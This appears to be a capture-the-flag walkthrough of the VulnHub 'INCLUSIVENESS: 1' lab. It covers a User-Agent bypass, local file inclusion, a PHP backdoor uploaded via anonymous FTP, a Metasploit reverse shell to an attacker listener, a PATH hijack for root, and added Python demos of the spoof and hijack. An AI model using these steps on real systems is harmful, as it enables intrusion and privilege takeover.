Another walkthrough for the VulnHub machine “INCLUSIVENESS: 1”, an intermediate-level lab by the authors “h4sh5 & Richard Lee”, designed to give a taste of the OSCP labs. The challenge is the same as any other CTF: capture the flag with the help of your pentest skills.
Download it from here: https://www.vulnhub.com/entry/inclusiveness-1,422/
Penetration Testing Methodologies
Network Scanning
· Netdiscover
· nmap
Enumeration
· Robots.txt
· User agent restriction bypass
· LFI
Exploiting LFI
· LFI to RCE
Privilege Escalation
· Abusing PATH Variable
Walkthrough
Network Scanning
As always, we start with netdiscover to get the IP of the VM; the host IP I found is 192.168.29.151.
Let's proceed with a network scan using the Nmap aggressive scan given below (all TCP ports, with service and script detection).
nmap -p- -A 192.168.29.151
The result shows port 21 open for FTP with anonymous login allowed and the /pub directory reported as writable, and ports 22 and 80 open for SSH and HTTP respectively.
Enumeration
To find any loopholes we need to enumerate further, so we browse to the host IP in the web browser, but unfortunately only the "Apache2 Debian Default Page" is found.
Instead we check for the robots.txt file, and the response is the message "You are not a search engine! You can't read my robots.txt!", which tells us the server is deciding what to serve based on the User-Agent header.
Without wasting time, I bypass this restriction by setting a custom user agent in Firefox using the following steps:
· In the URL bar open “about:config”
· Search for the preference name “useragent”
· Right-click > New > String
A dialog box appears; enter the preference name “general.useragent.override” as shown in the image below.
Enter the string value “GoogleBot” as the user agent.
Once the above steps are complete, the new preference appears in the list.
Now reload the /robots.txt page and you will be able to read the disallowed entry “/secret_information/”, as shown below.
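The bypass above works because the check is purely on a client-supplied header. The following script is an added example, not code from the original walkthrough: it stands up a local stand-in for the robots.txt gate (the VM's real server-side logic is not shown on the page, so the handler here is an assumption that simply looks for "googlebot" in the User-Agent) and then fetches robots.txt twice, once with the default client User-Agent and once spoofed, which is the same thing the Firefox `general.useragent.override` preference or `curl -A GoogleBot` does. The robots.txt body and the loopback host/port are constructed for the demo.

```python
"""Added example (not from the original walkthrough): a stand-in for the
robots.txt User-Agent gate, and the client-side header spoof that bypasses it.
The server-side check below is an assumption; robots.txt content is constructed."""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed robots.txt mirroring the entry the walkthrough uncovered.
ROBOTS_TXT = "User-agent: *\nDisallow: /secret_information/\n"
DENIED = "You are not a search engine! You can't read my robots.txt!\n"


class RobotsGate(BaseHTTPRequestHandler):
    """Serve robots.txt only to clients whose User-Agent claims to be Googlebot."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        if self.path == "/robots.txt" and "googlebot" in ua.lower():
            body = ROBOTS_TXT
        else:
            body = DENIED
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the stand-in gate on a free loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), RobotsGate)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch_robots(port, user_agent=None):
    """GET /robots.txt, optionally overriding the User-Agent header."""
    req = urllib.request.Request(f"http://127.0.0.1:{port}/robots.txt")
    if user_agent:
        req.add_header("User-Agent", user_agent)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def disallowed_paths(robots_body):
    """Pull the Disallow entries out of a robots.txt body."""
    return [line.split(":", 1)[1].strip()
            for line in robots_body.splitlines()
            if line.lower().startswith("disallow:")]


def demo():
    """Compare the default client UA (denied) with a spoofed GoogleBot UA (served).
    Returns (denial message, list of disallowed paths read via the spoof)."""
    srv, port = start_server()
    try:
        plain = fetch_robots(port)                  # urllib's default User-Agent
        spoofed = fetch_robots(port, "GoogleBot")   # the value set in about:config
    finally:
        srv.shutdown()
        srv.server_close()
    return plain, disallowed_paths(spoofed)


if __name__ == "__main__":
    denied, paths = demo()
    print("default UA  ->", denied.strip())
    print("GoogleBot UA -> Disallow:", paths)
```

The same gate would fall to any string containing "googlebot", which is why a User-Agent check is never an access control; the hidden path is only as secret as the header is hard to forge.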
So we browse to /secret_information, which brings up a web page describing the "DNS Zone Transfer Attack" with two hyperlinks, "English" and "Spanish".
When I click the "English" hyperlink, I find that it loads en.php through the lang parameter in the URL, which means there could be a local file inclusion (LFI).
Therefore, I try to read the /etc/passwd file by abusing the PHP include of the web page, and as a result I get the whole contents of /etc/passwd, as shown in the image below.
Exploiting LFI
So it was time to exploit the LFI by injecting a malicious file: as you know, the FTP service allows anonymous login and /pub is a writable directory.
We then read the "vsftpd.conf" FTP config file through the LFI to find where the writable directory lives on disk, since the include needs the filesystem path, not the FTP path.
We prepare a PHP file containing malicious code that will give us remote command execution once it is included.
Now it's time to upload the malicious file "backdoor.php" to the host machine via FTP, using the following commands:
ftp 192.168.29.151
cd /pub
put backdoor.php
Next, we need to include the uploaded file through the vulnerable lang parameter so that its PHP code executes.
Using that URL, run backdoor.php and pass it the OS command "id", as shown in the image provided here.
Having achieved RCE in the application by abusing the LFI, we continue with Metasploit's "web_delivery" module to compromise the host and obtain a reverse connection.
use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.29.208
set payload php/meterpreter/reverse_tcp
exploit
Target 1 is the PHP target; the module generates a one-line PHP payload which you execute through the web URL as done above.
So I copied the generated code and pasted it into the URL as the command to run, which gave me the reverse connection from the host.
Privilege Escalation
Booom!!! We hit the goal and obtained a meterpreter session on the host machine. Since this is a boot-to-root CTF, we need to escalate to a root shell, so we try to identify all programs or files with the SUID bit set.
With the help of the find command, we get a list of SUID binaries (programs that run with their owner's privileges, here root), and among them I notice /home/tom/rootshell.
Inside /home/tom/ I find the rootshell.c source file and the compiled rootshell binary, which has the SUID permission.
According to this piece of code, the program runs the “whoami” program for validation: if the output is the user "tom" you get a privileged shell, otherwise it just prints the ID of the currently logged-in user.
In simple words, rootshell gives a high-privilege shell if the output of the whoami program is “tom”.
You can easily take advantage of this configuration by abusing the PATH variable: the program calls whoami by name, so the shell resolves it through PATH, and whatever directory comes first wins. Here we create a file named "whoami" in the /tmp directory containing shell code that prints "tom":
cd /tmp
echo 'printf "tom"' > whoami
chmod 777 whoami
Then prepend /tmp to the PATH variable with the following command; echoing PATH confirms that /tmp is now searched first.
export PATH=/tmp:$PATH
echo $PATH
With that done, run rootshell to get the root shell and read the flag, as shown below.
cd /home/tom
./rootshell
cd /root
cat flag.txt
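To make the PATH hijack concrete without the SUID binary, here is an added example (not the author's code and not a reproduction of rootshell.c): it plants a fake `whoami` in a temporary directory, then runs `whoami` through `/bin/sh` the way a C program's `system("whoami")` would, once with the hijack directory prepended to PATH and once with PATH reset to a trusted value, which is one of the two standard fixes for rootshell.c (the other is calling `/usr/bin/whoami` by its absolute path). The temporary directory, the fake script body and the trusted PATH value are constructed for the demo, and a real `whoami` binary must exist in /usr/bin or /bin.

```python
"""Added example (not from the original walkthrough): PATH search-order
hijack of `whoami`, and the hardened lookup that defeats it.  Directory,
fake script body and trusted PATH value are constructed for the demo."""
import os
import shutil
import subprocess
import tempfile


def plant_fake_whoami(directory, answer="tom"):
    """Write an executable script named `whoami` that prints `answer`, the
    equivalent of: echo 'printf "tom"' > whoami; chmod 777 whoami."""
    path = os.path.join(directory, "whoami")
    with open(path, "w") as f:
        f.write("#!/bin/sh\nprintf '%s'\n" % answer)
    os.chmod(path, 0o755)
    return path


def run_whoami(hijack_dir=None, trusted_path=False):
    """Run `whoami` via /bin/sh, as system("whoami") in a C program does.
    hijack_dir   -> prepended to PATH, i.e. `export PATH=/tmp:$PATH`.
    trusted_path -> PATH reset to a fixed system value before the lookup,
                    the hardened behaviour a SUID program should have."""
    env = dict(os.environ)
    if hijack_dir:
        env["PATH"] = hijack_dir + os.pathsep + env.get("PATH", "")
    if trusted_path:
        env["PATH"] = "/usr/bin:/bin"      # assumed trusted value for the demo
    out = subprocess.run(["/bin/sh", "-c", "whoami"], env=env,
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def demo():
    """Plant the fake whoami, then compare the hijacked and hardened lookups."""
    tmp = tempfile.mkdtemp(prefix="hijack-")
    try:
        plant_fake_whoami(tmp)
        return {
            "hijacked": run_whoami(tmp),                     # fake wins: "tom"
            "hardened": run_whoami(tmp, trusted_path=True),  # real whoami wins
        }
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for label, user in demo().items():
        print(f"{label}: {user}")
```

The same lookup rule is why `ls`, `cat` or `id` called by bare name from any SUID or root-run script are just as hijackable: the check is not on the binary, it is on whatever PATH happens to say at exec time.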
Finally, we have the root shell and the flag.txt file. This lab is a good combination of basic web vulnerabilities and OS privilege escalation.